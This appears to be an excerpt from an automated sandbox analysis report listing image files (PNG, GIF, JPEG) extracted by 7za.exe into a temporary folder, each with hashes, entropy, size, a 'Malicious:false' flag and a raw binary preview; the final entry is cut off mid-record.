      Preview:.PNG........IHDR.............86O.....sRGB...,.....pHYs.................PLTE9FYakz......GSePFW.JP.LO.MM.KN.IR......v..DGX.MN.IR;GZ\gv......R]nOZk....cfgGVWbr....knBOa....~.qz.....SS.......ST.KN>J]...FRd...IUg...LWi...S_o...]gwAM`mw.P\m...ox.ERccm|...Zdty.....~..Vaqeo~kt.`jz=J\...r|.@M_dn}.T8.....IDATx.m.... .@Q...Xb.%..{oX...L.(s.[.].. D....B..0...W. F...h.....NyBs&....\-....r."...!5.Po(W6..-.M;|.....p}...C.#.c...S.3.s.......qq..0....&x:.|...y.....M,..=...=.../.Vv..q.9.D......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 336 x 44, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):8930
      Entropy (8bit):7.969146267861677
      Encrypted:false
      SSDEEP:
      MD5:355F782FF4E7A78199AE93F236201E4E
      SHA1:72804BAEAAA761DEA198BB9384ACFC74CA6D26C1
      SHA-256:46D38F49AC4443A01ED1CCC519D443E30B38C80E79D3AB6397A8846119E2333B
      SHA-512:0134DEC93DA848303D46483C40C6421BE48D21873EB9BBF4D94A235D932F39F8EA720A91CCD7778BD91B313FEEDC59DA79A4CF0E187B2812E84C5BA973CAA370
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...,.....3.......sRGB.......".IDATx..].|....Ss.c..(.Lh.V15.L...,lI....G.%@...C.$.........SB1.....b.&...$.6.jw.;........55......y.v...7o..q6.....E..a..V.X+...q.I.s?=.....~.C........|..\..B.6..g|.Sx.w+OVM.....9.p8.p`{.@F....w..l...x....)...6....EA...v.5/..,.r..1.7.8ns..D..8.p8..q -.Z.f2.B.0!~`j....f..?yR...^....!...L...q.y......>..f.w.....8....H*@......R..;.uf.5..N.....E...K..9...O..,.n...|&....i.x.]..s8.p...p.@B....u.:h.'..8.h/.....O...J}...th0...v.4.t..2.'.p......[.Z.Z.v?-..I..X.+..QU.}B...g.Go...>h}O...Q..9...O.....*Xm..F........w=&..,.~..<.....r...es..?+..[.u-.c.*NH.>.C.Y...Iv^.....%e.a.P..~0.B.r..<...V.o.a....\K.....(.1...ZS.e5.E.}yw.....v....S..M...b.e.+....M*S...YO..&r>...qS&t.N..w0S.Q.W...*y....z.v...&.....`.~T&/'\..)5X./...j.....LI!..D..T.\....x].....0......`{*'....I.3)...R!.k.|........%W. ....f.uB.n..=.+....}...iY...)......................x.@..._..X.].w.&.V.J$`.8.........)........|...E..V...c..<.o`..2..K...*.^H^
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 168 x 22, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3997
      Entropy (8bit):7.942642403869522
      Encrypted:false
      SSDEEP:
      MD5:CEFFD25D3E2ABD21B41FCB908F7349B1
      SHA1:C140FF775D62DEF0CED22969734759375993BDED
      SHA-256:7550AD65983FEDD656ADB7CEB8A392D1508E80822A04D50E6D9F095FC5B80F8A
      SHA-512:410DD72F1CAC12B27558D3F6EB9F72F0AEB69A4F855B9B5B496E50C99985B7C482904F0307AB23EFA603BC25327D6B8EB4CA0A0D7002551412962AB87321345C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............T......sRGB........WIDATh..Zyx..........e..6.9.......7....C.y.B..l.....9.|!.. d...I..d. .F.7.&.M......K8..6..ft.........f$K..?..T.4U..W.^.....cih.m..N.R.E.....`e..c.>A6!......EDZ(._..........RJj..?%.z.H..c..E}...__....g.?!.....mj.o.j#..c..o5M.!X..i.t]`).%.4...vM...f.6...8I .....SL.^.....iE.eWV..5F.?.,.".....}..\...........?CB.6t....K...Wl..VC.#..".[..5.....T.22....Gb.I...;.y...K..../<9..W.!.....;.js._.....H|.".. .&......k.}.|.O...M.........OSO.=p..2.O..AE*..v.G_....;._..\(.\...+.l..=....g....>..Q...)(.q.l...g.^H.......7.&.HM~~..3..G[0........... ...c.7........?.1.H..<o.`-DW.;.#3.#...q.n..........ckA.7X..{<......Rh..J...w\....q`z.P...>.b.g=Sh.......<..O.JKE.....L)......H..RYw"..[.W,.:......e:....}........B............qC.+L.%)...qB.p.j,.^z:.3.....&...."#_......x.a17....G..Le....s........G.{skgY&c..._q.k...;.k3}.E....../.=....~.^pJB.........y........!tj.....&Im..J_...%...*.y.....[..t.\..E.]R..'........8..~.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 204 x 35, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):4622
      Entropy (8bit):7.9327718559012075
      Encrypted:false
      SSDEEP:
      MD5:10EB51F76F3DF7A82B05ED747E27C6A7
      SHA1:157E45F82BA308431CECEDE2D753D775B54E83C8
      SHA-256:98856383428042C14739159F4A62168E9394F774BF2B696D62F46D70FC2BA175
      SHA-512:C497FAD9597C699A7C6355A5AEE999D8E240B1BCFBC39031F0C8B50BDB53F30F7FD43451BA3EA6B99E3FC414BFDD5DAE11A499CC9585322B039E6EF87BC31917
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......#......0.....sRGB........8eXIfMM.*.......i......................................#...........IDATx..].n.....R....O.^..E"...M.....".....6A.".....Z..E...h......."h.V......^.~..~.(..)Q.....Y....eI.......9............Q......i.[.F..5.[....'$?i>Y..j...GC.>.\i.Z....s7...k...LhZ.......V.....)6.,...r..k;I'+p.V`..@PJ..5..*$a.....V...r..Lvgg.9..D...(h....'.O)jkm7.x...I.If...p....T.^.j]...k......>|.....W,4.0.mFh.=pJ......D.$.6......._..k..Vq..5G.......k..$s...4....MJ..L.....__n%.&..........?}.d..q..>I_. Oa.?.[.$.A....|....N..D.....3#4.b..s...R..>..|N..d..\..~.....).]..l$$F.}.I4.+..Jk.....4....B.I.F...B.h...o|+i.......c....&B..T..7V.q+.e.v..........&.......{x.......}D...p1..I-m..].&.Gd.I.f}.n][5.].h.D.B..eC.k...G9e.a.X.6K.....&.u_}.U..G+..*j.Th.V...e.zQ6..$0*@...m..*URj~q.........rNq..;...l.jI.-n..V...o..*.J2..?.D`......,.!f....T.\.B.!<.(...S...&.@...w.[W....i.*v.%.,..n.xpd....x._Mh......3...V.*xiY...x...,...@..PX..|..0.(,...a......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 15 x 13, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):483
      Entropy (8bit):7.063170535813928
      Encrypted:false
      SSDEEP:
      MD5:193B1B9B28257FA1D73B78EDA7BE1087
      SHA1:3A06DDD109BD2BDE856BEE739ED9F4CB8CBDA2AA
      SHA-256:6EAA8C265E4980F98403D206CBE157F39EBD1AAC3676C4B3C596392C3768C14F
      SHA-512:F214F943FEE53F9BD2408EC63B936FF6CA16C065467DACF5AD509BD98D315E26A969E88AD6C00BE63C0216EAEB0AEC81E7FCA96D99E28CD28541623674CA3760
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............v.4A....sRGB........8eXIfMM.*.......i............................................^>.S...YIDAT(..Q.M.Q.=w...t.V ..V ...A..+`;...,.`.X...v........V...I.<..{.N..t.@...k.4x..a..6..2.y...Q.>..Y3FP.l..w... ....Y..$.N....A.I.X!........\..nG}.4...&....H......z....Q.....$.84...tQ.Z.j.%rr..-:@..W.#M....nE?S...en..0,3.D.f...V.9...S...z..fHv..-.....Z....Io.._...Y!.....E..G$=z....V..]..s].Vl...3NtFK.O........z.Xs>cb.J5...K..7.{a.b;.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):584
      Entropy (8bit):7.392190881661497
      Encrypted:false
      SSDEEP:
      MD5:633C01891DDB9E8F9D03C60FFF3380E8
      SHA1:725958B8017A1EC43551C31190596A18B08C4BF5
      SHA-256:637445A1B0BF68B08F325CB09221B340004E1A0B82E6E0D13A428C34118AABDA
      SHA-512:37891D204116B181CDEC5E4BEB0DE79C73D348DF8E8F0E605B50FDB47956C64E0BED329B176EF8088163C305C2305C5FE088753550D9E32F80169021CBA97724
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...............h6....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.3..P....IDAT8OM....`...j.o1....Q...b!...)."..X....QW.....a.vv2s...~._...........n..l. ..30...}>.R|..wp.n.0.\...u...x|>.....A.h8.....A.P n6...>.".5..7.N)......Z.U..S....V...U..>.....y<......|.j5.$1T&.....h$h..]..}.>.2!..j..t:.iM...C;..!.NK.....|..(Q...k..G:'..|.q.R..7...n..AHzb..S=\.."..dD.....n....C@..g.. F.F.m.Zq%v.'%8.J.v.....K.\.....!.@u.X0."...X,".G. .&.~.m....~.p..;.@..!..`..iL]../.?.N..5..Q.g..c<....F.....~a0.'...d.8...L..p.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 42 x 42
      Category:dropped
      Size (bytes):32992
      Entropy (8bit):7.444766737652239
      Encrypted:false
      SSDEEP:
      MD5:753622CDB83A6A695B5E98D7410A3072
      SHA1:AA08F1E0FFEEA39D3279D5FC8C0F490458B4966A
      SHA-256:30F1B256B3C6F1B99A240EF7054CC5894AA19F1CD5AAE2B977FC5BEB9923B556
      SHA-512:849A4F08728901D4CD907B06B043E250E8166AF09F343DF3B127302EB5A66EBD4D127384C87D3B18EFD27FC964F92E4D2FC9E928F69C40A96DC6CF9E8071FF33
      Malicious:false
      Reputation:low
      Preview:GIF89a*.*.........................................................................!..$..& .(! )#!+$",%#-%$/&$0'%0'%2(&3)&3)'4)'5*'5*'6*(6*(6*(6+(6+(6+(6+(6+)6+)6,)6,*6-*6-+7.+7.,7/-80.80/810921:42:54;65<87=:9@=<D@@GDDKHHOLLRNNUPPWRRYTS[UU]VV^XW`YXaZYc[Zd\[e\[f]\g]]g^]h^]i_^i_^j_^j_^j_^j_^j_^j_^j_^j__k`_j`_j`_j`_j`_la`mcboedqgfsihukjwnmxon{sq}vt.xw.{z.~}.........................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,....*.*........H......*\....#J.H.....].x..F..?>.)r`)Y.I..f....(..$.MU../c..)..M.9....1...4m.4.RiIu.. ,...XK.b.+.Q....K..1....][..B.e..J..].."!4.../0..6c.W....]."8.....1a*..1`...V....d.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 26 x 55, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):489
      Entropy (8bit):7.303299962082577
      Encrypted:false
      SSDEEP:
      MD5:6B84124FA2935BF7ECCFBCACB4778C58
      SHA1:BA1837CD0A1793559738CABE4E8B49CDD41B7E88
      SHA-256:D00F8E5FDA4525DBE2C479516D94E71DB09E03892C4953F8D4D62FAFC7611C6B
      SHA-512:0B96A1AE8DD4207741690B75C48E061CF6DC5EBB8E017B2B8B1A668D25C51410AD0A0F4F2C261F75E621EE0F73F1EAD8C0E98F260A57F154F29FB52FC840C40A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......7......xZ&....pHYs...........~.....IDATX..aO.0.....L....../....C..KI..........=m....q.Y..w...9..l....v. 3{..w.. .i....&..I..}f....h../.g.U..O.]=.w.>..-...w?...Ram.....M.A.@....a.agw?.7......s....+lRP...RaUA5.j+*.V.T+.(h............T$.6.....R...2..ZX..W..TP.?\...}K3[.......*B.T..w@.}..n.d....8%.l.jg8..9..<.W.>!.....8vj..S......%..\........$f}....9.*.h.O.X...J...%V..H..3$n$A.._n%N>9y ..J....H$.X(O..$n.'..W...LIO G$..Aw....<_.]o.~..{\....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 27 x 55, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):492
      Entropy (8bit):7.325124368199776
      Encrypted:false
      SSDEEP:
      MD5:992898575D32989AE500E481B30A8582
      SHA1:9B9BED350828CE0F118E302A1212E37070717929
      SHA-256:C43FE7BE806A6127862E4820E18DCABAFEAD691C480F92F867BEB5200AC88861
      SHA-512:3BB9ABE33035E5E1B1962CED8023CCB93A5D8DB8135E9A55A54165EF60BCFDB89F6D5EBCA3A41B10B9A5D61EAF4F08E379CDADA7D8458102247D03445F59BA0A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......7.......1.....pHYs...........~.....IDATX...N.0.E.;EBE..../n..VQ.+...I|..$.....*.@D:.IU.p.#......6...3..YD.......sa.Rf...B.Y...\........^D..0.nt....32...`r..".h0........._..G.......nhv[........C7..6t......)...X..o....!jh...1..k54r.V...k14..54.A..Ji.J....{.Ra{..H.w..>.u....[...?gU....8..Z...D...w.o.#.z.ggz|..uAP...=.._\..!.Vwq...z...i....R....B.Z.a-.5.Z.k...jX.*X.b.."..]....h.m...#...,O.y...y.%G.OU}g6........vX.~.^.....c.d.*....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):10936
      Entropy (8bit):7.81944997994361
      Encrypted:false
      SSDEEP:
      MD5:93DECE4F0FABD1D8D9031913CEED3AB2
      SHA1:C4EEAA81F29BBDB2D77A78C056EDFB3A9415675B
      SHA-256:690CEDAF371BAE82E1F717CCC3803CB067BFADC3EDA90BD258E010F8929EC957
      SHA-512:A69071246EA1D6FE662D939EF921BC14DDF69AB8E1E658BB8116A821060B6650B74886FCD285D2443F44BD6DD002203DE59AF3DE7498CD0F63E6C8E326B58C40
      Malicious:false
      Reputation:low
      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................P..........*........................................................................................................................................................................................................................................ 0....45@!1P."23`p.......................40!1... A...2.3s.@Qa.".....BPqr.#.p..R.........................!....................!1. 0AQaq.@P.......p`...............@...........................................................................I ....P.B.............,X.`........'$....6..4,h........hH...2(h..Z..AP...@........F...T..3........ .A...........\...L.....X.$T... ... .S2.*@.....A.g.K.4...S.../d."..H...$......bT.s.X...A$.bz...@...0<`.O...<OT..g..*...f^68..P......7(t......G...4...S....IZB..B.,r..%...%...H ....H>..yyF...*`x.....EBE...r.".c..PA ....@$/....@...0<`.%.$..E..P....$..JP. ..|.|. .@.....T........'B%..YT......s".MI...<..4..J.]`.(.c.h........$.d.0.(I.Q.KsH.P..e.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 404x266, components 3
      Category:dropped
      Size (bytes):46553
      Entropy (8bit):5.3624745124326765
      Encrypted:false
      SSDEEP:
      MD5:E28B66BAAF37F4C6E91426C91296C71A
      SHA1:2701A76185F744497B1F38661C31E99338ADB9B7
      SHA-256:88D2F979B90C6D031DD581095805CDC7FBD9E8E1D7C4FFD56D7AAE17FDE278CB
      SHA-512:3AE0449BD7853A119CA8613DDBA080A81E20630E18B5233A2005F8B53BDA572511C34A74D34059B2F08CC55CDB327B3797EA4548643A7E9682197467333BBDA5
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H.........http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c137 79.159768, 2016/08/11-13:24:42 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:xmpTPg="http://ns.adobe.com/xap/1.0/t/pg/". xmlns:stDim="http://ns.adobe.com/xap/1.0/sType/Dimensions#". xmlns:xmpG="http://ns.adobe.com/xap/1.0/
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):14057
      Entropy (8bit):7.844888248256908
      Encrypted:false
      SSDEEP:
      MD5:71FE91969D855D053B6E13F8F1073C5B
      SHA1:2DA632F08C5309893870694EDE727F2AEF181A9A
      SHA-256:3F9C83F63B7A7EA5A63299A778319449766F5E5B95D4F31609842300A195F64E
      SHA-512:299864E1374A1C080655407698FEAB8FE505BDB75994765CC72E4EAC4F8599EAC232BEAE94417B0E3FEA4B762EFF1429B80C8DE402F2AC247FB41F37CFEF353F
      Malicious:false
      Reputation:low
      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................1..$...6.......................................................................................................................................................................................................................................... @P.0!.1".`2#34$......................1..!A. Qaq"20@P......BRr3..#`b.C.S...................P..! a10pQq."`.A......................!1A.Qaq. 0@P........`............................................................2Dc.iK...^....................5}6...i.Z.M6,....d................Y..z^...JV...o..........9...o.Y;a...................4=_Qvq.....%l...K..u.=-.?3...|i..7...................:..6n/L..5..U......v....r.o.................x.7..'y.......&.<.K.....v......XF.."@.........<.%.}...m.7.l..@")......6o&.....L).8..........A.4}.&...^gV..U..U...}%.....VD..................5.1t..?....s.y...~}..1+....w...`.x]......&...`.........X...4.?C.i.+.M.s..l0...l{r9.{f......5..2S.T.....#.L+RN...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):274
      Entropy (8bit):6.742834357157893
      Encrypted:false
      SSDEEP:
      MD5:585E8DEE6212BE62DF5D657FCD2F739E
      SHA1:B5202E50C7F5FB500CF25CF5B9B5B47E57C3D701
      SHA-256:A66F935E48D95D77FDEDD0B0E891A952B0FD72B1A39B8E977B1219790D4E777F
      SHA-512:4C79EE2B52D7DF03ABEA9218BDFB9B47BD8651225C8BA91E52CF6E96BCB0982C77E1B4D13DDFD9C61A9B87C6C597627065F01F9010D29D6AA378EC9A154C188F
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................a....pHYs...%...%.IR$.....IDAT8..]..@..?.@-.$#....*..J%......MN.u.5@_..J ..{...N.s.0.,af..J..$S.3..7...{..JI.A.VM.s<%...f...8......j...af....s.s..\..e4(v.`f.. ....;.4;.$.B..P..P.......*..5....$.7.I.$.X...../..-.H..._HtLRC..r....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):351
      Entropy (8bit):7.0579456072382785
      Encrypted:false
      SSDEEP:
      MD5:44DF4A0DA6BC156FC9D57B22EA55907E
      SHA1:467ABF3145C396E6641568262AFBA744B17BFE5E
      SHA-256:9FAA13006D8765B8AAC6DD3FEEB70BAAD2191535679E23C8C3D08BC8E59AF507
      SHA-512:D7D65C3978CF18E26D4C6472CEB038F98A04FEEA8334D4EB6F59BF59FFA1D92B6BE6BD07707A3F0D40FA76477E728B0810A0945359C07114C4D003A8E8C7E810
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................a....pHYs...%...%.IR$.....IDAT8...M.@.D_....p..M...0..*.%..L...L.N.+..B.......#..V......qd.fV.H:NqV..3...p.q?.VR79..:..y.Z..@.h....[....F..`0..g.3...Nx.......|....G...K...of-...E0...v,#...(b%iX.v..e.*/N...8.{..=.E: MY.......<.QS{..}.,..Aj...I........(ga.xO.)].:.[~.5.%..'?...5..[...........zn.:O\....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):76183
      Entropy (8bit):7.897799996197668
      Encrypted:false
      SSDEEP:
      MD5:0FE15E733DA75ADB935CB484DFF0FD28
      SHA1:798BD6F2842A626EEBE38B52ABEFAB3235E89EE6
      SHA-256:C5EC14FE3F769DA7E4B673AE5FEC021C8B74A9AE424AEA822976CFA199CDE92E
      SHA-512:4E7481DC98E624FFFEA97F552CBB43F42D757B3EAEAB86B4041A8435D762122B57BF1CC40C1D2AB36150ABC3DEFF2EBE75D581D4D07EAA0D1AFC4E3F7790E5F8
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...............................................8Photoshop 3.0.8BIM........8BIM.%..................B~........................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................3............?...(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):76075
      Entropy (8bit):7.902010243300911
      Encrypted:false
      SSDEEP:
      MD5:0F616F3D913E90A6AF495C32070B3B6D
      SHA1:46164846200C588081C3D1B95C40610283B8F904
      SHA-256:6336AEC49B9DC7E4085DB204A37CEAAC7671FF5C88DFA0129F382EDE06AFE502
      SHA-512:CE46CF9F8DDCAC611A560F3FB5C436654B772CB4EBB81EDF57CE34E405573987702E0ED43C9298AB92A139E239A9E8A76AD5D182825F50D7ACC1031727408A6A
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...............................................8Photoshop 3.0.8BIM........8BIM.%..................B~........................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................3............?...(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):76075
      Entropy (8bit):7.891659462841734
      Encrypted:false
      SSDEEP:
      MD5:FC675CCC770F9459495F4C5F5F0E5495
      SHA1:483F47962FD59937EF8D7E49A713D0FB6997DC3E
      SHA-256:1FBB1510AE2F6DB083CDDF7C0F16364D5F5D2938737A297556C268C039A28165
      SHA-512:65015DD2F41B5E50EDDFD9615882061B3E7897005587996E5E009DAA62AC6164C4F3444EC3DA8FA15EBB07F5FDE25F699CDD85F0A9ED7F33A1225240EFB1FDE9
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....@Exif..MM.*.......i...............................................8Photoshop 3.0.8BIM........8BIM.%..................B~........................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C......................................................................3............?...(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(......(......(......(......(....?....(......(......(......(......(......(......(......(......(
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):17205
      Entropy (8bit):7.914830783390904
      Encrypted:false
      SSDEEP:
      MD5:4F755C5ED8EB50AA6E83087C88B3B0DA
      SHA1:8B8B42E94E59828A422FAC4FE43AFB833B0102F5
      SHA-256:DFA833839927C06BB93AC73917968420CA0C463C84C632FFA37FAAF26541DF50
      SHA-512:69BF91A9824C0FD9964382B4C709F8BCD3D31CDC8F1F7B0948DCD40B870A135A71139DC01B8AC50936940BADBD3934150BC3E1D790665AF5AB000C4191E43502
      Malicious:false
      Reputation:low
      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.......................+...C3............................................................................................................................................................................................................................................ 0!1@P"45..`.A2#p.....................!.1.0AQa."2.3. q..r.4...BR...@.b.#....Pp.C$...................1A`...!....................!1AQ.aq 0.....@P....`.......................................................... ...........$.@.....*T.............I.X....P........@l. .&......... .. .X..,.@,A...I$.......B.B...*s..RBL.X.X.P.........e.X.. ......T...,.A...QK3*.. ....h....u..h.r...g4...S...l.......=.c%... .J.@....."X......./...c@...<q..A.......J.....l...D.....2.u..V/......8.."....@. ..B.%kq}g.j...PH.../.3}.]...T.....L.B.. ...B.&w.\..S..La.VY.2.../.s.i.@...<q..@&...%..S..,s.3....I.GJr..D..9o.2.....n,.&.G....t...S...4D..A+$.C.9.A.5Z.!b,.p..:..S.f,....]ev.o...i.......T...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 404x266, components 3
      Category:dropped
      Size (bytes):74707
      Entropy (8bit):6.729347768551713
      Encrypted:false
      SSDEEP:
      MD5:BE177013855EC689640044E23ED47333
      SHA1:219DC150A523B490CD2D0205507A1CD45022FC52
      SHA-256:66EBEA03CC6E3B5A3579B675D4D228BF1736F21DBDB407832242F276D294DFD2
      SHA-512:AC40B35593563CE2B82766C2B38CA1E99A100239901DF11D4453A89B37627EB17C541F48ECF68486F432460C3F9275B415EA2635427B0629DAB22711AC7EC655
      Malicious:false
      Reputation:low
      Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H........http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c137 79.159768, 2016/08/11-13:24:42 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:xmpTPg="http://ns.adobe.com/xap/1.0/t/pg/". xmlns:stDim="http://ns.adobe.com/xap/1.0/sType/Dimensions#". xmlns:xmpG="http://ns.adobe.com/xap/1.0/
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):7965
      Entropy (8bit):7.5540364959166775
      Encrypted:false
      SSDEEP:
      MD5:E77D9C32AFDF13C173C28616E17009FA
      SHA1:57682FD9965CA4D28F1052EC03F7ADC4A3FD1A1C
      SHA-256:CE6692A807F0ED55D80D8A98B0EAA89F192261FAC9BA99CE5CD136FC4F61A7EE
      SHA-512:2F086CCB08FC202095F6FEBDFCE3FA5EA7298E0C45AE410B5447ED85BCF800C865764064E76DD0457BB150E26D0A0FE3FE8CFFB162359CDDD2D5D2761387BDD1
      Malicious:false
      Reputation:low
      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................v................................................................................................................................................................................................................................................@.. 0P.`"p..!24.3.....................1.!A..@2. 0Qaq."...P..Bb#3.`...rp...C......................................!1.@AQa 0.q....P...`p.................P....................................................................................+4%......K..............+..5.@..................................................'.J........V..............:cu..c._J.........8p...........7k;.......@.............R.......S.A............. .......{..a`.V5....p...>.M........Mc?x.......`...._.@....MN}'......Gx.....#..W#..h.HJy*...9L.z......s........i.....-..3.B..1l.D}L|.[....C.bCO.N....@.......cu......5}$|..s..3O........g.<.....X.]^}@.........;......:......C.#...q.Y..dW....R....Y..`.....~...@..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 403x265, components 3
      Category:dropped
      Size (bytes):17900
      Entropy (8bit):7.894277164338363
      Encrypted:false
      SSDEEP:
      MD5:1D95BE4F9C23AF7740BA5B1C0BE20916
      SHA1:59FC5BFCC6C18563DEAF9A5DE8026ED910E3504D
      SHA-256:68E00415A50B520F5441305EA38ED650DE63261583D10851A158B49D051EEDCD
